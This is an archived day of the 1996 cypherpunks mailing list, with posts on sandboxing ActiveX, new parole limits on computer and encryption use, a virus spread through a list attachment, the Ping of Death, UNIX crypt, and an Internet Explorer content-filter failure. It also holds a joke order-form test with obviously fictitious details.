MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Thought you'd find this amusing.

Some names may have been changed to protect the innocent.

- -rich

- ---------- Forwarded message ----------
Date: Tue, 17 Dec 1996 15:24:36 -0800
From: Alice D'Anonymous <>
To: win95netbugs-owner@lists.stanford.edu
Subject: Inernet Eplorer

I reqiure assistance in obtaining my internet explorer connection.  I
made an error while deleting cache, history and temp files which somehow
prevents me from hooking up to Microsoft's Explorer.

In the control panel I attempt to click on the Internet Icon and the
following occurs:  A Content Advisor box appears and states the
following:  Content advisor configuration information is missing. 
Someone may have tried to tamper with it.  Check content Advisor
Settings.  End of quote.  In the internet properties box, I tried to
look for what they recommended but was not sure what to look for.

I have the Windows 95 disk.  Could you please advise accordingly.
P.S. Netscape works fine.  I previously had Internet Explorer woking
before I cleaned house.

Thanks...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMrcuKZNcNyVVy0jxAQF7dgH+JZt25esoFtkgsVx/p6iRJkvQVvkYpSDr
OKoAL4PB01++okGIKOCGPdWC+Uxs9cQJTX+4ZW/8CTN5aHX/D2glmg==
=qsrc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 17 Dec 1996 12:44:32 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Securing ActiveX.
In-Reply-To: <01BBEC03.C251AC10@bcdev.com>
Message-ID: <Pine.SUN.3.91.961217152435.5536C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Dec 1996, Blake Coverett wrote:

> I would be happier running an ActiveX control with Peter Trei's signature on it
> than I would an unsigned control in a sandbox.  (This kind of a trust decision
> is probably the normal case in the intranet world.  ActiveX as it sits is quite
> sufficient for rolling out internal intranet applications.)

And I'd be happier running the signed ActiveX control, written by Peter 
Trie, or anyone else within a Sandbox regardless of signature as it 
increases security.
 
> On the second point, I never suggested that a sandbox would require virtual CPU
> emulation.  What I do find likely is that the overhead from the extended types
> of checking the kernel would need to do would probably outweight the performance
> advantage of native code over a JIT compiler.  The DES cracker is probably not
> a good example of the problem because it would make virtually no API calls.

You did however say this a few days ago:

"This thread branch seems to be based on bad assumption.  Why would
one want to run ActiveX controls in a sandbox?  If you need a sandbox,
use a Java applet, if you need native code level access to the system
use ActiveX."

The above says that you wouldn't want to run ActiveX in a sandbox while 
you would want to run Java in a sandbox.  The difference between 
technologies is that one runs native the other emulative.  I wouldn't 
want to run ANY foreign code outside a sandbox.  Java or ActiveX.
 
The whole point of this was creating a distributed network of DES 
crackers.  There is zero API security checking on a control that does 
nothing but math and integer operations.  The loss of performance occurs 
when the control or applet wants to read or write to the file system or 
tries to talk over the network, which a DES cracker won't do very much 
of, hrrrm?  In other words, an ActiveX sandbox will not slow down the DES 
cracker, and it will increase security.  What's your problem with it 
being used on ActiveX when you say it's cool to use on Java applets?

> This is scaremongering.  No, I don't virus scan every new CD I get from
> Microsoft/Netscape/etc, do you?

I back up my hard drives to CDR's.  While it is true that viruses can get 
into my system, I'd notice them quickly with the scanners, and if they 
did manage to wipe my drives, I'd have the data safe on CD where they 
can't write.  I don't store programs on the CD's, just data.

> More importantly to the discussion at
> hand, what is to prevent said virus from infecting the compiler used to
> build the sandbox?  Part of the decision to trust a software vendor must
> include trusting that they use appropriate clean build procedures.

Precisely why you need to sandbox an OS.  A good operating system / virus
scanner doesn't allow programs to modify other programs, except for a
user approved compiler.  If you've ever used a Mac compiler and 
Symantec's SAM, you'll notice that if you enable certain features, you 
have to allow exceptions for your compilers - you as the user.

If a virus infects your compiler it is because you've allowed it 
permissions to do so previously.  (With my Mac, I have the virus checkers 
warn me, even when I compile. Yes, it is annoying, but it's much safer.)
 
> If you choose to run an unsigned control all bets are off.  On a related note,
> I recently saw a Java implementation of a board game that recommended
> the user download the zipped up .classes and run it locally.  How many
> average users realize this would disable the Java sandbox entirely?

How many users know how to download the jdk and run the java vm locally?  
Yeah, all bets are off when you download an unsigned control, but having 
them downloaded into a sandbox means that even if they are written by 
VulisSoft, they won't damage anything of importantce.
 
> > Right, so if that's the case, why would you allow ActiveX controls to run 
> > on your system?  It's the same problem whether signed or not as 
> > signatures only tell you the author's identity and not much else.
> 
> You mis-read the paragraph above.  Trying to build the sandbox for native
> code as you've described is akin to the problem above.  Is it not?

It is not.  The sandbox runs in supervisory (Ring 0 for you intel freaks) 
mode, the code it allows to execute runs in user mode (ring 3 is an 
example) so no matter what the control does, it cannot get into anything 
the sandbox doesn't allow it to since it cannot switch to supervisory mode.
(Assuming you've implemented your sandbox securely and it lacks security 
holes.)

At the same time, only I/O calls are hindered by the extra checking, so 
it's a moot point in the case of the DES cracker.

Now what you are saying is that if you don't trust the control, why 
should you trust the manufacturer of the sandbox?  The answer is that 
they are a highly more visible target for lawsuits than a possibly 
unknown author who wrote some control which you ran ten months ago that 
decided to wake up today and wipe your drive.

There's a big difference between protect the user wholy and presenting a 
dialog box where they can press Ok to download a destructive bit of code.
In one case the user is culpable for agreeing to download destructive 
code, the other prevents the problem from happening.

Also, the secure sandbox source code can be made visible (if such an 
entity as one that wrote it deems to do so in the name of trust.)  See 
pgp.  need I say more?  Would you trust PGP more or less than say Norton 
Diskreet?

Whether or not you are qualified to analyze PGP source code isn't the 
issue, you at least have the ability to do so once you learn how.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Tue, 17 Dec 1996 15:55:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ping of Death?
Message-ID: <3.0.32.19691231160000.006b2998@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


read about it here
	http://www.sophist.demon.co.uk/ping/

At 02:39 PM 12/17/96 -0700, you wrote:
>Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
>hostile code, disguised as a mere ping, that can lead to server rebooting.
>
>James Glave
>
>Technology Assignment Editor, Wired News, http://www.wired.com/
>Producer, Packet, http://www.packet.com/
>Phone: 1.415.276.8455
>Fax: 1.415.276.8499

------------------------------------
pgp KeyID 3D932EA9 
pub key available via mailto:pgp-public-keys@keys.pgp.net
	subject: get drink@aa.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Tue, 17 Dec 1996 16:01:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Computer crime prompts new parole restrictions
Message-ID: <199612172358.PAA29660@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I saw this article in the nando.net paper today and was interested in
your thoughts on it. It looks like people on probation will be limited 
in there use of encryption and access to the Internet.

To me, it seems like this could be equated to preventing 
people on probabtion from using something like a phone. I am
having problems with it because I feel these limitations are too
severe. I mean, a good way someone on probabtion to make a living
is to learn how to use the web and prehaps get a job as a html
coder.

There is a hacker I know of (Kevin Poulsen) who is prevented from 
using computers during his current probation and it really has limited 
his options alot. I curated and maintain a website for him at URL:

	http://www.catalog.com/kevin/

where this issue is dicussed.

It also seems to me that preventing people on probation from 
using encryption would be difficult especially when encryption is used
in webservers (ie Netscapes Secure Server). One could accidentally 
access one and not know that he was sending/receiving information
via an encrypted channel.

thanks,

-lile


http://www.nando.net/newsroom/ntn/info/121796/info1_7523.html

----------------------------------------------------------------------------

Computer crime prompts new parole restrictions
----------------------------------------------------------------------------

Copyright (c) 1996 Nando.net
Copyright (c) 1996 The Associated Press

WASHINGTON (Dec 17, 1996 07:42 a.m. EST) -- The U.S. Parole Commission has
approved restrictions on the use of computers by certain high-risk parolees.

The Justice Department announced Monday that the panel voted this month to
authorize such restrictions as requiring certain parolees to get prior
written approval from the commission before using an Internet service
provider, computerized bulletin board system or any public or private
computer network.

Other restrictions would: prohibit particular parolees from possessing or
using data encryption programs, require some parolees to agree to
unannounced inspection of computers by probation officers, require some
parolees to compile daily logs of computer use or to pay for equipment to
monitor their computer use.

"Unrestricted access to the Internet and other computer online services can
provide sophisticated offenders with new opportunities for crime and
criminal associations," said Edward F. Reilly Jr., commission chairman. "We
cannot ignore the possibility that such offenders may be tempted to use
computer services to repeat their crimes."

The commission noted a surge in "how-to" information on child molestation,
hate crime and the illegal use of explosives available on the Internet and
on computer online services.

Copyright (c) 1996 Nando.net
Do you have some feedback for the Nando Times staff?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Date: Tue, 17 Dec 1996 14:00:12 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Re: Securing ActiveX.
Message-ID: <01BBEC3B.F2F5EF10@crecy.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




Bill Frantz <frantz@netcom.com> wrote in article <59721c$t8o@life.ai.mit.edu>...
> At 7:19 AM -0800 12/17/96, Blake Coverett wrote:
> >I would be happier running an ActiveX control with Peter Trei's signature
> >on it
> >than I would an unsigned control in a sandbox.  (This kind of a trust decision
> >is probably the normal case in the intranet world.  ActiveX as it sits is
> >quite
> >sufficient for rolling out internal intranet applications.)
> 
> While I might agree about Peter, I wouldn't agree if the signature was
> Microsoft's (or any other large software vendor).  There is just too much
> room for bugs and or Trojan horses to enter via that route.

I fail to see what the fuss is about. there are clearly advantages to having
a good operating system architecture which provides protection for running
applications and allows fine grained control over access to sensitive 
resources.

The problem with the Java Sandbox model is that its all or nothing. In
order to protect the user it allows the applet access to nothing that is
important. As a result the applet can perform no function that is
of importance. "Give us your corporate strategy and billing record
and we will give you dancing beans on your screen" as one wag
put it.

I am still waiting to see a Java applet that does anything usefull. Most
do no more than an animated gif would. The most elaborate are little
more than carbon copies of the standard computer games.

The download problem really is not that hard. The big problem is 
content. So far nobody appears to have the remotest idea how to
use Java and I expect it to be about five years before the model
emerges. From hypercard to the Web took ten so don't
expect it to be overnight.

The Microsoft bashing could be given a rest. Bill G. wins only 
because the rest of the market gave up. Stick a non computer 
litterate person in front of UNIX, Lotus 1-2-3 for MS Dos or 
Wordperfect for MS-Dos. If you don't realse then why Bill won
you should try another career.

MS-DOS and Windows are crappy O/S because they lack the 
type of memory protection that VMS and UNIX have. This was 
in part incompetence but mostly Intels disastrous design for the 
80286. Meanwhile Apple managed to produce an inexcusably bad
O/S without protection on a chip that had excelent provision for it.

If you want your applet to do anything of use then the Java security
model is inadequate. It is usefull for the software developer to have 
a rich security model since it makes it much easier to build secure
software. Under VMS there are 32 different priviledges allowing
fairly fine grained control. It is possible in some cases to access
a wider range of resources by nafarious tricks but its hard to do
something bad by accident.


		Phill
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent Padua" <vincent@psnw.com>
Date: Tue, 17 Dec 1996 16:37:35 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: The virus I got...
Message-ID: <199612180037.QAA09468@sierra.psnw.com>
MIME-Version: 1.0
Content-Type: text/plain


There was an e-mail sent to the list that had attached to it a virus.  Well
lucky me I got.  It was a .com file that apparently turns your files into
directories.  I can't boot into Win95 since it turned my HIMEM.SYS into a
directory.  So, I seem to have fixed that, but now it says "access denied"
and then prompts me with C:\>.  Did anyone else get it?  Has anyone heard
or fixed this virus?

Thanks

//Vince




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rcgraves@ix.netcom.com
Date: Tue, 17 Dec 1996 17:06:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Parolees limited from using computers, Internet
Message-ID: <199612180106.RAA06684@mailhub.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

E. Allen Smith wrote:

[As title]

When I saw the title, I though this was a parody, but sad to say,
it's not. Why yes, the world has gone mad; it's not just Vulis.
What's next, libraries?

(Scratch that -- libraries are already censored.)

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMrdDQEFGBFr0lf2RAQFqAAfQtp9UwxMaq70WGp7AiXKekwPDGTy1CKvI
xmJB/rICQVqaZZOLe40rIgDHVS7wPeIqtjpXoxEskR9qBOTkZwmNVTMMYzPNQlX5
SdVgm8ikfRQiSXM6HIuDIj6AdFjOz0SE5htR8ZGWFIbG8K3F30KF3lno0/oIr0I9
rMttYasUINoF6lObn0G/mObQ0OkG9u9t1vq7xbs1q7ro20BkXelA/x3/4aCYKg85
NUXR4ZeAAiS2NgfKAH8sLWjCo7CnUe1+yJFgqnhyS86nGucWMauSqtzHmMg+0WN4
1vLVCqq/AKF6tZSmSw2kIJbhzMw2eyQuwR3SIjA4NXVR8g==
=d+pm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 17 Dec 1996 17:26:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Securing ActiveX.
Message-ID: <3.0.32.19961217172629.006ae028@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:41 PM 12/17/96 -0500, Phillip M. Hallam-Baker wrote:
>I am still waiting to see a Java applet that does anything usefull. Most
>do no more than an animated gif would. The most elaborate are little
>more than carbon copies of the standard computer games.

<http://www.ozemail.com.au/~geoffk/anon/anon.html>

Try it now. It is not only good, it is fast.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 17 Dec 1996 17:43:27 -0800 (PST)
To: Lile Elam <cypherpunks@toad.com
Subject: Re: Computer crime prompts new parole restrictions
Message-ID: <3.0.32.19961217173732.006a2d38@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:58 PM 12/17/96 -0800, Lile Elam wrote:
[...]
>It also seems to me that preventing people on probation from 
>using encryption would be difficult especially when encryption is used
>in webservers (ie Netscapes Secure Server). One could accidentally 
>access one and not know that he was sending/receiving information
>via an encrypted channel.
[...]

Note that the new rules require logging of computer usage. I would assume
that means keystroke logging with nightly uploads to the Feds.

What motto does the US Parole Commission have on their seal? May I suggest
"Arbeit macht frei"? Who are these people anyway? I never heard of this
commission...





-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Dec 1996 15:05:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Van Eck's TEMPEST Paper
Message-ID: <1.5.4.32.19961217230218.006e1f30@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


As a supplement to Joel McNamara's exemplary new 
TEMPEST page, and thanks to Steve Schear, we've put 
Van Eck's 1985 paper on TEMPEST at:

   http://jya.com/emr.pdf  (702 kb)

It's a finely detailed paper on EMR snooping with copious 
graphics. As Joel and Seline note, it may be purposely 
misleading on TEMPEST, (as appropriate to TEMPEST 
legends; Seline's may be bent as well, but who knows 
what the disinfoes know).

Read Joel's page for the bright light facts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anne Carasik <stripes@m3142axc.ssr.hp.com>
Date: Tue, 17 Dec 1996 15:01:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: UNIX crypt
Message-ID: <199612172302.SAA05145@m3142axc.ssr.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure this has been discussed before, but this
has come to mind recently.


Has UNIX crypt been broken?

If so, what was used to break the encryption?

Are there any documented cases of it?

Thanks for your help,

AC
---------------------------------------------------------------
 /_  __  /  Anne Carasik    /  Professional Services Organization
/ / /_/ / TN 919.460.2368  /  Raleigh Sales Office 
   /   / Fax 919.460.2249 /  stripes@m3142axc.ssr.hp.com
   All opinions expressed are mine, no one else would want them




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 17 Dec 1996 21:21:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <961217.193402.3q9.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I just got my copy of the Microsoft Cryptographic Service Provider
Development Kit, Version 1.0.  It appears to support only Windows NT.  A
first glance reveals no built-in GAK (but I haven't examined it closely
yet!).

Dammit, now I'm going to have to build an NT box!
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrdK4Rvikii9febJAQFXQQP/TUlEBwQpLNE3WBq45AXcbAzqc8RkmvkT
5mtz2FSwGleKvg5HRjB5JF3SjjyQ32nsGMpnt/J/r6K84Q7pJWPBHOPgcVzEGSqw
ORqumCQlL8uUJKk552BdB9X92QNiDV33QkIIyKQv8An208jTnqEWrYvg1R1lwCXf
lkne/kxf0po=
=fQZX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 17 Dec 1996 19:57:02 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Microsoft IE may not work without censorship files
In-Reply-To: <01BBEC64.E3422BF0@bcdev.com>
Message-ID: <Pine.GUL.3.95.961217194914.11267C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Dec 1996, Blake Coverett wrote:

> > In the control panel I attempt to click on the Internet Icon and the
> > following occurs:  A Content Advisor box appears and states the
> > following:  Content advisor configuration information is missing. 
> > Someone may have tried to tamper with it.  Check content Advisor
> > Settings.  End of quote.  In the internet properties box, I tried to
> > look for what they recommended but was not sure what to look for.
> 
> It's good to see they make at least an attempt at preventing the
> PICS filter from being turned off without a password.

True, but my point was stronger.

The program *will not work* if there have been even inadvertent changes
to the self-censorship files. This person emailed me because he couldn't
get it to work after an unrelated change.

This sort of contradicts Microsoft's claims that they don't require
ratings because they're turned off by default. If the file can't fix
itself, I'd say that's not "default."

This person wasn't trying to get around ratings. It was his personal
machine, which up and broke because of the censorship bits.

Sorry, I didn't get the context across. Read it again alongside this: 

http://pathfinder.com/Netly/daily/961213.html

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob. R. Roberts" <bob@jail.sg>
Date: Tue, 17 Dec 1996 20:21:53 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Test only, sorry, NOISE, do not read
Message-ID: <199612180421.UAA11164@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The following form contents were entered on 18th Dec 96
Date = 18 Dec 96 04:18:56
subject = Test only, sorry, NOISE, do not read
resulturl = http://www.netmart.com/steppingstones/thanks.html
uname = Bob. R. Roberts
email = bob@jail.sg
Address = 4625 E. Elm Drive
Apartment or suite = 14
CITY = Chula Vista
STATE/PROVINCE = Oklahoma
country = USA
zip = 01238
phone = 407-251-1701
work phone = 407-352-1702
FAX = 407-453-1703
ship to name = Mary M. Roberts
ship to email = mary@aol.gov
ship toAddress = 14207 Broadway NE
ship to Apartment or suite = 600
ship to CITY = Janesville
ship to STATE/PROVINCE = Texas
ship to country = USA
ship to zip = 95442
Book = My Dinosaur Adventure
first name = Freddie
middle name = Jurgen
last name = Robertson
nickname = Goober
age = 6
hometown = Hickville
gender = Boy
dedication = grow up, punk
book from = Gran & Grump
Date Book = 12/4/95
Friend#1 = Muffy
Friend#2 = Scooter
Friend#3 = Slim
Child's Birthday = 2/1/91
Baby's name = Grinder
Baby's gender = Boy
How did you hear? = E-Mail
Invitation # = none
Mastercard  = on
call = on
credit card number = 251-4444-25713-591-3
credit card name = Richard Q. Nickson
expiraion date = 8/22/98






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 17 Dec 1996 21:11:29 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Computer crime prompts new parole restrictions
Message-ID: <3.0.32.19961217210630.006f1a24@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:44 PM 12/17/96 -0800, Lucky Green wrote:

>What motto does the US Parole Commission have on their seal? May I suggest
>"Arbeit macht frei"? Who are these people anyway? I never heard of this
>commission...

See <http://gopher.usdoj.gov/bureaus/parole.html>; I dunno what's on their
seal.

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vangelis <vangelis@qnis.net>
Date: Tue, 17 Dec 1996 21:29:02 -0800 (PST)
To: Vincent Padua <vincent@psnw.com>
Subject: Re: The virus I got...
In-Reply-To: <199612180037.QAA09468@sierra.psnw.com>
Message-ID: <32B77DD1.5060@qnis.net>
MIME-Version: 1.0
Content-Type: text/plain


Vincent Padua wrote:
> 
> There was an e-mail sent to the list that had attached to it a virus. 
> Well lucky me I got.  It was a .com file that apparently turns your 
> files into

May I ask what on earth possessed you to run on a non-expendable machine
a .COM attached to email sent by a spammer who obviously didn't even
have business-related intentions?
-- 
Vangelis <vangelis@qnis.net> /\oo/\
Finger for public key. PGP KeyID 1024/A558B025
PGP Fingerprint AE E0 BE 68 EE 7B CF 04  02 97 02 86 F0 C7 69 25
Life is my religion, the world is my altar.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 17 Dec 1996 21:36:12 -0800 (PST)
To: Lile Elam <lile@art.net>
Subject: Re: Computer crime prompts new parole restrictions
Message-ID: <3.0.32.19961217213649.00725928@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:58 PM 12/17/96 -0800, Lile Elam wrote:

>I saw this article in the nando.net paper today and was interested in
>your thoughts on it. It looks like people on probation will be limited 
>in there use of encryption and access to the Internet.

One nit to pick - parole and probation are not the same thing. Probation is
a sentence imposed by a judge, and parole is the administrative/executive
modification of a sentence. They function in similar ways (e.g., people who
have been convicted of a crime are not locked up but subjected to extra
rules) but have some legally meaningful differences. 

The press release from the USPC is online at
<http://gopher.usdoj.gov/gopherdata/press_releases/592usp.htm>. 

>To me, it seems like this could be equated to preventing 
>people on probabtion from using something like a phone. I am
>having problems with it because I feel these limitations are too
>severe. I mean, a good way someone on probabtion to make a living
>is to learn how to use the web and prehaps get a job as a html
>coder.

This seems like a pretty fact-specific question; but it's not unusual for
people convicted of crimes to be restricted from using tools similar to the
ones they used to commit crimes, e.g., drivers' licenses are suspended
where people are convicted of driving crimes, professional licenses are
taken away when people have committed professional misconduct, and so
forth. I agree that this can be counterproductive (it doesn't make much
sense to seriously handicap someone and then blame them for not doing very
well) but I don't think that computers and the Internet are meaningfully
different in this way.

>There is a hacker I know of (Kevin Poulsen) who is prevented from 
>using computers during his current probation and it really has limited 
>his options alot. I curated and maintain a website for him at URL:
>
>	http://www.catalog.com/kevin/
>
>where this issue is dicussed.

My hunch is it didn't make a big difference, but his letter to the judge
who accepted his guilty plea and sentenced him seems to suggest that he
turns to computer crime out of curiosity, boredom, and obsession - motives
which are probably still present. Three years without computers may force
him to find some other outlet for his creative and exploratory drives. This
seems like a long-term win for him. (I think denying him access to higher
education is much worse than denying him access to computers.)  

>It also seems to me that preventing people on probation from 
>using encryption would be difficult especially when encryption is used
>in webservers (ie Netscapes Secure Server). One could accidentally 
>access one and not know that he was sending/receiving information
>via an encrypted channel.

This sounds like a fact issue for a probation/parole revocation hearing,
e.g., did the defendant intend to violate the terms of his or her release
agreement? Depending on the situation, an unintentional violation of the
terms of release might not result in revocation. (I'm inclined to think it
never should, but I'm not having much luck finding any relevant caselaw
quickly. I'm also handwaving here because different jurisdictions will
probably apply different rules.)

My impression is that the USPC was bamboozled (by the USDOJ?) into adopting
unnecessary regulations - the press release mentions a "surge of how-to
information" available on the Net re criminal activity; but I'm skeptical
that such a surge has taken place, or that it's especially relevant to
people on parole. 

The action may also have been unnecessary (viz, the restrictions on crypto)
because people subject to parole and probation are already subjected to
incredibly draconian restrictions - e.g., the terms of probation and parole
usually specify that they must allow the supervising officer to search
their home at any time, must report where they live and work, cannot form
social relationships with people deemed undesirable, cannot quit their job
or change residences, must report their income and expenses in considerable
detail, must give blood/urine samples on a surprise basis, etc. People who
are on parole or probation have no privacy and very little autonomy. It's
not much of a stretch to "You must let the probation officer look through
your house" to "You must let the probation officer see what's on your hard
disk" - in fact, I think the first implies the second. 

(Obviously, there are a ton of fact-specific issues here (and I've written
briefs arguing why parolees/prisoners should get more privacy), but at the
"public policy" level, it's pretty clear that probationers and parolees
have sharply curtailed Constitutional rights - which is usually OK with
them, because they like that better than being locked up. In my
perspective, it makes more sense to rethink the goals and methods of the
criminal trial/punishment system, rather than focus on minutiae about
computer crime. Lots of otherwise apparently decent people are subjected to
relatively harsh punishment on a pretty regular basis, and many people
think we aren't already mean enough to convicted people. Most of the people
who think this have never had someone they cared about subjected to the
penal system. But this isn't really C-punks material any more, so I'll stop
here.) 

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 17 Dec 1996 18:55:49 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Microsoft IE may not work without censorship files
Message-ID: <01BBEC64.E3422BF0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> In the control panel I attempt to click on the Internet Icon and the
> following occurs:  A Content Advisor box appears and states the
> following:  Content advisor configuration information is missing. 
> Someone may have tried to tamper with it.  Check content Advisor
> Settings.  End of quote.  In the internet properties box, I tried to
> look for what they recommended but was not sure what to look for.

It's good to see they make at least an attempt at preventing the
PICS filter from being turned off without a password.

Of course the obvious answer is to give it to a teenage boy who
wants to look at the dirty pictures and watch how fast it can be
fixed with a little registry editing.

regards,
-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Psionic Damage <zerofaith@mail.geocities.com>
Date: Tue, 17 Dec 1996 21:59:19 -0800 (PST)
To: Bryan Reece <reece@taz.nceye.net>
Subject: Re: The virus I got...
Message-ID: <199612180559.VAA06903@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain



How come not everyone got it, did it depend on the x-mailer you are using?


At 02:59 AM 12/18/96 -0000, you wrote:
>
>
>----------geoboundary
>Content-Type: text/html; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>
>
>
><HTML>
><BODY>
><CENTER>
><A HREF="http://www.geocities.com">Postage paid by: <IMG
SRC="http://www.geocities.com/pictures/newgeobt.gif"></A></CENTER>
></BODY>
></HTML>
>
>----------geoboundary
>
>
>
>   Delivered-To: reece-cpunks@taz.nceye.net
>   Delivered-To: reece@taz.nceye.net
>   From: "Vincent Padua" <vincent@psnw.com>
>   Date: Tue, 17 Dec 1996 16:41:57 -0800
>   X-MSMail-Priority: Normal
>   X-Priority: 3
>   X-Mailer: Microsoft Internet Mail 4.70.1155
>   MIME-Version: 1.0
>   Content-Type: text/plain; charset=ISO-8859-1
>   Content-Transfer-Encoding: 7bit
>   Sender: owner-cypherpunks@toad.com
>   Precedence: bulk
>
>   There was an e-mail sent to the list that had attached to it a virus.  Well
>   lucky me I got.  It was a .com file that apparently turns your files into
>   directories.  I can't boot into Win95 since it turned my HIMEM.SYS into a
>   directory.  So, I seem to have fixed that, but now it says "access denied"
>   and then prompts me with C:\>.  Did anyone else get it?  Has anyone heard
>   or fixed this virus?
>
>Yes.  It's a deadly mutation of the GOOD TIMES virus.
>
>(People actually go to the trouble of stripping off the leading crap
>from the uuencoded part and then *run a program* from someone called
>Fuck@yourself.up? Furrfu.)
>
>----------geoboundary--
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 17 Dec 1996 19:00:33 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Ping of Death?
Message-ID: <01BBEC65.8DA20C00@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
> hostile code, disguised as a mere ping, that can lead to server rebooting.

> Technology Assignment Editor, Wired News, http://www.wired.com/
> Producer, Packet, http://www.packet.com/

I read the two parts above and shake my head...
A 'technology assignment editor' that has missed 
this story till now, and can't use a search engine 
to boot?

-Blake (who should only look at the pictures)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 17 Dec 1996 20:18:03 -0800 (PST)
